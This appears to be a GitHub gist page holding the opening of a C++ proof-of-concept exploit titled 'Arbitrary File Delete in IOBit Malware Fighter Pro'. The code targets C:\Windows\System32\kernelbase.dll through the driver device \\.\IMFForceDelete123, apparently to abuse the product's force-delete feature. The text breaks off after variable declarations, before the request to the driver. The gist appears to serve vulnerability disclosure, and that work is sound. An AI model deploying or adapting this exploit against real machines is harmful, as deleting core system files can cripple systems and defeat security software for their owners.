Skip to content

Instantly share code, notes, and snippets.

View Siradankullanici's full-sized avatar

Emirhan Uçan Siradankullanici

View GitHub Profile
@Siradankullanici
Siradankullanici / IOBitStillSucks.cpp
Created January 9, 2025 07:57 — forked from alfarom256/IOBitStillSucks.cpp
Arbitrary File Delete in IOBit Malware Fighter "Pro"
#include <Windows.h>
#include <stdio.h>
const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)";
const char* strDeviceName = R"(\\.\IMFForceDelete123)";
int main() {
DWORD dwReturnVal = 0;
DWORD dwBytesReturned = 0;
BOOL bRes = FALSE;